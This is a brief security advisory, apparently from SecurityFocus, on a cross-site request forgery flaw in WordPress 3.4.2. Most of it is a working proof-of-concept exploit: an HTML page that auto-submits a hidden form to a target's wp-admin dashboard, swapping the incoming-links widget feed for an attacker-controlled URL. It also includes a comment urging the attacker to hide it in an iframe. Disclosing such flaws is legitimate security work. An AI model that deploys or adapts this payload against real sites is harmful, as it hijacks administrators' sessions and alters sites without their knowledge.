source: https://www.securityfocus.com/bid/55660/info
WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
WordPress 3.4.2is vulnerable; other versions may also be affected.<body onload="javascript:document.forms[0].submit()"><form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post"class="dashboard-widget-control-form"><h1>How Many Girls You Have? xD))</h1><!-- Idea for you: Iframe it --><input name="widget-rss[1][url]"type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php"/><select id="rss-items-1" name="widget-rss[1][items]"><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option><option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option><option value='10'>10</option><option value='11'>11</option><option value='12'>12</option><option value='13'>13</option><option value='14'>14</option><option value='15'>15</option><option value='16'>16</option><option value='17'>17</option><option value='18'>18</option><option value='19'>19</option><option value='20' selected='selected'>20</option></select><inputid="rss-show-date-1" name="widget-rss[1][show_date]"type="checkbox" value="1" checked="checked"/><inputtype="hidden" name="widget_id" value="dashboard_incoming_links"/></form>
